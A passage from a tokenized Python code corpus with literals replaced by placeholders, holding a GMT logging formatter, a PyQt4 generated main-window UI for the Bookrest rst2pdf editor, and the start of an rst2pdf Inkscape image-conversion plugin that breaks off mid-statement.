<EOL> manager . write_info ( bundles_info ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import time <EOL> import logging <EOL> _DEFAULT_FMT = '<STR_LIT>' <EOL> class Formatter ( logging . Formatter ) : <EOL> def __init__ ( self , fmt = None , datefmt = None ) : <EOL> logging . Formatter . __init__ ( self , fmt or _DEFAULT_FMT , datefmt ) <EOL> self . converter = time . gmtime <EOL> def formatException ( self , exc_info ) : <EOL> text = logging . Formatter . formatException ( self , exc_info ) <EOL> text = '<STR_LIT:\n>' . join ( ( '<STR_LIT>' % line ) for line in text . splitlines ( ) ) <EOL> return text </s>
<s> from PyQt4 import QtCore , QtGui <EOL> class Ui_MainWindow ( object ) : <EOL> def setupUi ( self , MainWindow ) : <EOL> MainWindow . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> icon = QtGui . QIcon ( ) <EOL> icon . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> MainWindow . setWindowIcon ( icon ) <EOL> self . centralWidget = QtGui . QWidget ( MainWindow ) <EOL> self . centralWidget . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_3 = QtGui . QHBoxLayout ( self . centralWidget ) <EOL> self . horizontalLayout_3 . setMargin ( <NUM_LIT:3> ) <EOL> self . horizontalLayout_3 . setObjectName ( "<STR_LIT>" ) <EOL> self . tabs = QtGui . QTabWidget ( self . centralWidget ) <EOL> sizePolicy = QtGui . QSizePolicy ( QtGui . QSizePolicy . Expanding , QtGui . QSizePolicy . Expanding ) <EOL> sizePolicy . setHorizontalStretch ( <NUM_LIT:0> ) <EOL> sizePolicy . setVerticalStretch ( <NUM_LIT:0> ) <EOL> sizePolicy . setHeightForWidth ( self . tabs . sizePolicy ( ) . hasHeightForWidth ( ) ) <EOL> self . tabs . setSizePolicy ( sizePolicy ) <EOL> self . tabs . setObjectName ( "<STR_LIT>" ) <EOL> self . tab = QtGui . QWidget ( ) <EOL> self . tab . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout = QtGui . QHBoxLayout ( self . tab ) <EOL> self . horizontalLayout . setMargin ( <NUM_LIT:0> ) <EOL> self . horizontalLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . text = CodeEditor ( self . tab ) <EOL> font = QtGui . QFont ( ) <EOL> font . setFamily ( "<STR_LIT>" ) <EOL> self . text . setFont ( font ) <EOL> self . text . setFrameShape ( QtGui . QFrame . NoFrame ) <EOL> self . text . setFrameShadow ( QtGui . QFrame . Plain ) <EOL> self . text . setLineWidth ( <NUM_LIT:0> ) <EOL> self . text . setObjectName ( "<STR_LIT:text>" ) <EOL> self . horizontalLayout . addWidget ( self . text ) <EOL> self . tabs . addTab ( self . tab , "<STR_LIT>" ) <EOL> self . tab_2 = QtGui . QWidget ( ) <EOL> self . tab_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_2 = QtGui . QHBoxLayout ( self . tab_2 ) <EOL> self . horizontalLayout_2 . setMargin ( <NUM_LIT:0> ) <EOL> self . horizontalLayout_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . style = CodeEditor ( self . tab_2 ) <EOL> font = QtGui . QFont ( ) <EOL> font . setFamily ( "<STR_LIT>" ) <EOL> self . style . setFont ( font ) <EOL> self . style . setFrameShape ( QtGui . QFrame . NoFrame ) <EOL> self . style . setObjectName ( "<STR_LIT>" ) <EOL> self . horizontalLayout_2 . addWidget ( self . style ) <EOL> self . tabs . addTab ( self . tab_2 , "<STR_LIT>" ) <EOL> self . horizontalLayout_3 . addWidget ( self . tabs ) <EOL> MainWindow . setCentralWidget ( self . centralWidget ) <EOL> self . statusBar = QtGui . QStatusBar ( MainWindow ) <EOL> self . statusBar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . setStatusBar ( self . statusBar ) <EOL> self . menuBar = QtGui . QMenuBar ( MainWindow ) <EOL> self . menuBar . setGeometry ( QtCore . QRect ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:32> ) ) <EOL> self . menuBar . setObjectName ( "<STR_LIT>" ) <EOL> self . menuText = QtGui . QMenu ( self . menuBar ) <EOL> self . menuText . setObjectName ( "<STR_LIT>" ) <EOL> self . menuView = QtGui . QMenu ( self . menuBar ) <EOL> self . menuView . setObjectName ( "<STR_LIT>" ) <EOL> self . menuEdit = QtGui . QMenu ( self . menuBar ) <EOL> self . menuEdit . setObjectName ( "<STR_LIT>" ) <EOL> self . menuHelp = QtGui . QMenu ( self . menuBar ) <EOL> self . menuHelp . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . setMenuBar ( self . menuBar ) <EOL> self . toolBar = QtGui . QToolBar ( MainWindow ) <EOL> self . toolBar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . TopToolBarArea , self . toolBar ) <EOL> self . pdfbar = QtGui . QToolBar ( MainWindow ) <EOL> self . pdfbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . TopToolBarArea , self . pdfbar ) <EOL> self . dock = QtGui . QDockWidget ( MainWindow ) <EOL> icon1 = QtGui . QIcon ( ) <EOL> icon1 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . dock . setWindowIcon ( icon1 ) <EOL> self . dock . setObjectName ( "<STR_LIT>" ) <EOL> self . dockWidgetContents = QtGui . QWidget ( ) <EOL> self . dockWidgetContents . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout = QtGui . QVBoxLayout ( self . dockWidgetContents ) <EOL> self . verticalLayout . setMargin ( <NUM_LIT:0> ) <EOL> self . verticalLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . dockLayout = QtGui . QVBoxLayout ( ) <EOL> self . dockLayout . setSpacing ( <NUM_LIT:0> ) <EOL> self . dockLayout . setSizeConstraint ( QtGui . QLayout . SetNoConstraint ) <EOL> self . dockLayout . setContentsMargins ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . dockLayout . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout . addLayout ( self . dockLayout ) <EOL> self . dock . setWidget ( self . dockWidgetContents ) <EOL> MainWindow . addDockWidget ( QtCore . Qt . DockWidgetArea ( <NUM_LIT:2> ) , self . dock ) <EOL> self . editbar = QtGui . QToolBar ( MainWindow ) <EOL> self . editbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . TopToolBarArea , self . editbar ) <EOL> self . searchbar = QtGui . QToolBar ( MainWindow ) <EOL> self . searchbar . setMovable ( False ) <EOL> self . searchbar . setAllowedAreas ( QtCore . Qt . BottomToolBarArea ) <EOL> self . searchbar . setFloatable ( False ) <EOL> self . searchbar . setObjectName ( "<STR_LIT>" ) <EOL> MainWindow . addToolBar ( QtCore . Qt . BottomToolBarArea , self . searchbar ) <EOL> self . structure = QtGui . QDockWidget ( MainWindow ) <EOL> self . structure . setObjectName ( "<STR_LIT>" ) <EOL> self . dockWidgetContents_2 = QtGui . QWidget ( ) <EOL> self . dockWidgetContents_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout_3 = QtGui . QVBoxLayout ( self . dockWidgetContents_2 ) <EOL> self . verticalLayout_3 . setMargin ( <NUM_LIT:0> ) <EOL> self . verticalLayout_3 . setObjectName ( "<STR_LIT>" ) <EOL> self . verticalLayout_2 = QtGui . QVBoxLayout ( ) <EOL> self . verticalLayout_2 . setObjectName ( "<STR_LIT>" ) <EOL> self . tree = QtGui . QTreeWidget ( self . dockWidgetContents_2 ) <EOL> self . tree . setEditTriggers ( QtGui . QAbstractItemView . NoEditTriggers ) <EOL> self . tree . setProperty ( "<STR_LIT>" , QtCore . QVariant ( False ) ) <EOL> self . tree . setAlternatingRowColors ( True ) <EOL> self . tree . setHeaderHidden ( False ) <EOL> self . tree . setObjectName ( "<STR_LIT>" ) <EOL> self . tree . header ( ) . setVisible ( True ) <EOL> self . tree . header ( ) . setStretchLastSection ( False ) <EOL> self . verticalLayout_2 . addWidget ( self . tree ) <EOL> self . verticalLayout_3 . addLayout ( self . verticalLayout_2 ) <EOL> self . structure . setWidget ( self . dockWidgetContents_2 ) <EOL> MainWindow . addDockWidget ( QtCore . Qt . DockWidgetArea ( <NUM_LIT:1> ) , self . structure ) <EOL> self . actionLoad_Text = QtGui . QAction ( MainWindow ) <EOL> icon2 = QtGui . QIcon ( ) <EOL> icon2 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionLoad_Text . setIcon ( icon2 ) <EOL> self . actionLoad_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionLoad_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionLoad_Style . setIcon ( icon2 ) <EOL> self . actionLoad_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRender = QtGui . QAction ( MainWindow ) <EOL> self . actionRender . setIcon ( icon1 ) <EOL> self . actionRender . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_Text = QtGui . QAction ( MainWindow ) <EOL> icon3 = QtGui . QIcon ( ) <EOL> icon3 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionSave_Text . setIcon ( icon3 ) <EOL> self . actionSave_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionSave_Style . setIcon ( icon3 ) <EOL> self . actionSave_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSave_PDF = QtGui . QAction ( MainWindow ) <EOL> self . actionSave_PDF . setIcon ( icon1 ) <EOL> self . actionSave_PDF . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_Text = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_Text . setIcon ( icon3 ) <EOL> self . actionSaveAs_Text . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_Style = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_Style . setIcon ( icon3 ) <EOL> self . actionSaveAs_Style . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSaveAs_PDF = QtGui . QAction ( MainWindow ) <EOL> self . actionSaveAs_PDF . setIcon ( icon1 ) <EOL> self . actionSaveAs_PDF . setObjectName ( "<STR_LIT>" ) <EOL> self . actionUndo1 = QtGui . QAction ( MainWindow ) <EOL> self . actionUndo1 . setEnabled ( False ) <EOL> icon4 = QtGui . QIcon ( ) <EOL> icon4 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionUndo1 . setIcon ( icon4 ) <EOL> self . actionUndo1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRedo1 = QtGui . QAction ( MainWindow ) <EOL> self . actionRedo1 . setEnabled ( False ) <EOL> icon5 = QtGui . QIcon ( ) <EOL> icon5 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionRedo1 . setIcon ( icon5 ) <EOL> self . actionRedo1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCut1 = QtGui . QAction ( MainWindow ) <EOL> self . actionCut1 . setEnabled ( False ) <EOL> icon6 = QtGui . QIcon ( ) <EOL> icon6 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionCut1 . setIcon ( icon6 ) <EOL> self . actionCut1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCopy1 = QtGui . QAction ( MainWindow ) <EOL> self . actionCopy1 . setEnabled ( False ) <EOL> icon7 = QtGui . QIcon ( ) <EOL> icon7 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionCopy1 . setIcon ( icon7 ) <EOL> self . actionCopy1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionPaste1 = QtGui . QAction ( MainWindow ) <EOL> self . actionPaste1 . setEnabled ( False ) <EOL> icon8 = QtGui . QIcon ( ) <EOL> icon8 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionPaste1 . setIcon ( icon8 ) <EOL> self . actionPaste1 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionUndo2 = QtGui . QAction ( MainWindow ) <EOL> self . actionUndo2 . setEnabled ( False ) <EOL> self . actionUndo2 . setIcon ( icon4 ) <EOL> self . actionUndo2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionRedo2 = QtGui . QAction ( MainWindow ) <EOL> self . actionRedo2 . setEnabled ( False ) <EOL> self . actionRedo2 . setIcon ( icon5 ) <EOL> self . actionRedo2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCut2 = QtGui . QAction ( MainWindow ) <EOL> self . actionCut2 . setEnabled ( False ) <EOL> self . actionCut2 . setIcon ( icon6 ) <EOL> self . actionCut2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionCopy2 = QtGui . QAction ( MainWindow ) <EOL> self . actionCopy2 . setEnabled ( False ) <EOL> self . actionCopy2 . setIcon ( icon7 ) <EOL> self . actionCopy2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionPaste2 = QtGui . QAction ( MainWindow ) <EOL> self . actionPaste2 . setEnabled ( False ) <EOL> self . actionPaste2 . setIcon ( icon8 ) <EOL> self . actionPaste2 . setObjectName ( "<STR_LIT>" ) <EOL> self . actionFind = QtGui . QAction ( MainWindow ) <EOL> icon9 = QtGui . QIcon ( ) <EOL> icon9 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionFind . setIcon ( icon9 ) <EOL> self . actionFind . setObjectName ( "<STR_LIT>" ) <EOL> self . actionAbout_Bookrest = QtGui . QAction ( MainWindow ) <EOL> self . actionAbout_Bookrest . setObjectName ( "<STR_LIT>" ) <EOL> self . actionTest_Action = QtGui . QAction ( MainWindow ) <EOL> self . actionTest_Action . setObjectName ( "<STR_LIT>" ) <EOL> self . actionSettings = QtGui . QAction ( MainWindow ) <EOL> icon10 = QtGui . QIcon ( ) <EOL> icon10 . addPixmap ( QtGui . QPixmap ( "<STR_LIT>" ) , QtGui . QIcon . Normal , QtGui . QIcon . Off ) <EOL> self . actionSettings . setIcon ( icon10 ) <EOL> self . actionSettings . setObjectName ( "<STR_LIT>" ) <EOL> self . menuText . addAction ( self . actionLoad_Text ) <EOL> self . menuText . addAction ( self . actionLoad_Style ) <EOL> self . menuText . addSeparator ( ) <EOL> self . menuText . addAction ( self . actionSave_Text ) <EOL> self . menuText . addAction ( self . actionSaveAs_Text ) <EOL> self . menuText . addAction ( self . actionSave_Style ) <EOL> self . menuText . addAction ( self . actionSaveAs_Style ) <EOL> self . menuText . addAction ( self . actionSave_PDF ) <EOL> self . menuText . addAction ( self . actionSaveAs_PDF ) <EOL> self . menuEdit . addAction ( self . actionUndo1 ) <EOL> self . menuEdit . addAction ( self . actionUndo2 ) <EOL> self . menuEdit . addAction ( self . actionRedo1 ) <EOL> self . menuEdit . addAction ( self . actionRedo2 ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . actionCut1 ) <EOL> self . menuEdit . addAction ( self . actionCut2 ) <EOL> self . menuEdit . addAction ( self . actionCopy1 ) <EOL> self . menuEdit . addAction ( self . actionCopy2 ) <EOL> self . menuEdit . addAction ( self . actionPaste1 ) <EOL> self . menuEdit . addAction ( self . actionPaste2 ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . actionFind ) <EOL> self . menuEdit . addSeparator ( ) <EOL> self . menuEdit . addAction ( self . actionSettings ) <EOL> self . menuHelp . addAction ( self . actionAbout_Bookrest ) <EOL> self . menuBar . addAction ( self . menuText . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuEdit . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuView . menuAction ( ) ) <EOL> self . menuBar . addAction ( self . menuHelp . menuAction ( ) ) <EOL> self . toolBar . addAction ( self . actionLoad_Text ) <EOL> self . toolBar . addAction ( self . actionRender ) <EOL> self . toolBar . addAction ( self . actionSettings ) <EOL> self . editbar . addAction ( self . actionUndo1 ) <EOL> self . editbar . addAction ( self . actionUndo2 ) <EOL> self . editbar . addAction ( self . actionRedo1 ) <EOL> self . editbar . addAction ( self . actionRedo2 ) <EOL> self . editbar . addAction ( self . actionCut1 ) <EOL> self . editbar . addAction ( self . actionCut2 ) <EOL> self . editbar . addAction ( self . actionCopy1 ) <EOL> self . editbar . addAction ( self . actionCopy2 ) <EOL> self . editbar . addAction ( self . actionPaste1 ) <EOL> self . editbar . addAction ( self . actionPaste2 ) <EOL> self . retranslateUi ( MainWindow ) <EOL> self . tabs . setCurrentIndex ( <NUM_LIT:0> ) <EOL> QtCore . QMetaObject . connectSlotsByName ( MainWindow ) <EOL> MainWindow . setTabOrder ( self . text , self . tabs ) <EOL> MainWindow . setTabOrder ( self . tabs , self . style ) <EOL> def retranslateUi ( self , MainWindow ) : <EOL> MainWindow . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tabs . setTabText ( self . tabs . indexOf ( self . tab ) , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tabs . setTabText ( self . tabs . indexOf ( self . tab_2 ) , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuText . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuView . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuEdit . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . menuHelp . setTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . toolBar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . pdfbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . dock . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . editbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . searchbar . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . structure . setWindowTitle ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tree . headerItem ( ) . setText ( <NUM_LIT:0> , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . tree . headerItem ( ) . setText ( <NUM_LIT:1> , QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Text . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionLoad_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRender . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Text . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_PDF . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSave_PDF . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Text . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Text . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Style . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_Style . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_PDF . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSaveAs_PDF . setToolTip ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste1 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste1 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionUndo2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionRedo2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCut2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionCopy2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste2 . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionPaste2 . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionFind . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionFind . setShortcut ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionAbout_Bookrest . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionTest_Action . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> self . actionSettings . setText ( QtGui . QApplication . translate ( "<STR_LIT>" , "<STR_LIT>" , None , QtGui . QApplication . UnicodeUTF8 ) ) <EOL> from codeeditor import CodeEditor <EOL> import icons_rc <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> MainWindow = QtGui . QMainWindow ( ) <EOL> ui = Ui_MainWindow ( ) <EOL> ui . setupUi ( MainWindow ) <EOL> MainWindow . show ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys , os , tempfile , subprocess <EOL> from weakref import WeakKeyDictionary <EOL> from rst2pdf . log import log <EOL> from vectorpdf_r2p import VectorPdf <EOL> import rst2pdf . image <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> progname = os . path . expandvars ( r'<STR_LIT>' ) <EOL> else : <EOL> progname = '<STR_LIT>' <EOL> class InkscapeImage ( VectorPdf ) : <EOL> source_filecache = WeakKeyDictionary ( ) <EOL> @ classmethod <EOL> def available ( self ) : <EOL> return True <EOL> def __init__ ( self , filename , width = None , height = None , kind = '<STR_LIT>' , <EOL> mask = None , lazy = True , srcinfo = None ) : <EOL> client , uri = srcinfo <EOL> cache = self . source_filecache . setdefault ( client , { } ) <EOL> pdffname = cache . get ( filename ) <EOL> if pdffname is None : <EOL> tmpf , pdffname = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> os . close ( tmpf ) <EOL> client . to_unlink . append ( pdffname ) <EOL> cache [ filename ] = pdffname <EOL> cmd = [ progname , os . path . abspath ( filename ) , '<STR_LIT>' , pdffname ] <EOL> try : <EOL> subprocess . call ( cmd ) <EOL> except OSError , e : <EOL> log . error ( "<STR_LIT>" , '<STR_LIT:U+0020>' . join ( cmd ) ) <EOL> raise <EOL> self . load_xobj ( ( client , pdffname ) ) <EOL> pdfuri = uri . replace ( filename , pdffname ) <EOL> pdfsrc = client , pdfuri <EOL> VectorPdf . __init__ ( self , pdfuri , width , height , kind , mask , lazy , pdfsrc ) <EOL> @ classmethod <EOL> def raster ( self , filename , client ) : <EOL> """<STR_LIT>""" <EOL> cache = self . source_filecache . setdefault ( client , { } ) <EOL> pngfname = cache . get ( filename + '<STR_LIT>' ) <EOL> if pngfname is None : <EOL> tmpf , pngfname = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> os . close ( tmpf ) <EOL> client . to_unlink . append ( pngfname ) <EOL> cache [ filename + '<STR_LIT>' ] = pngfname <EOL> cmd = [ progname , os . path . abspath ( filename ) , 